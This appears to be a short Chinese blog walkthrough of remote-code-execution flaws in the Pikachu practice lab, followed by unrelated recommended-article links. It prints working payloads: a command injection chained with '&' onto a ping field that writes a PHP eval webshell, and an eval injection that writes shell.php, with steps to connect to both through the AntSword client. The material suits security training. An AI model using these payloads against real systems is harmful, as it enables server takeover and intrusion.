Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
黎阳之光1 分钟前
【黎阳之光:以无线专网与视频孪生,赋能智慧广电与数字中国】
算法·安全·智慧城市·数字孪生
V__KING__28 分钟前
systemd-remount-fs,fstab之间的渊源
linux·服务器·网络
Titan20242 小时前
Linux环境变量个人笔记
linux·服务器·c++
zx_zx_1232 小时前
传输层协议tcp (2)
服务器·网络·tcp/ip
青柠代码录2 小时前
【Linux】路径区分:testdir、testdir/、testdir/*
linux·运维·服务器
Benszen3 小时前
Docker容器化解决方案全解析
运维·docker·容器
badhope3 小时前
Docker从零开始安装配置全攻略
运维·人工智能·vscode·python·docker·容器·github
lplum_3 小时前
2025第十届“楚慧杯”湖北省网络与数据安全实践能力竞赛 wp
网络·安全·web安全·网络安全·系统安全·密码学·新人首发
mounter6254 小时前
基于MLX设备的Devlink 工具全指南与核心架构演进
linux·运维·服务器·网络·架构·kernel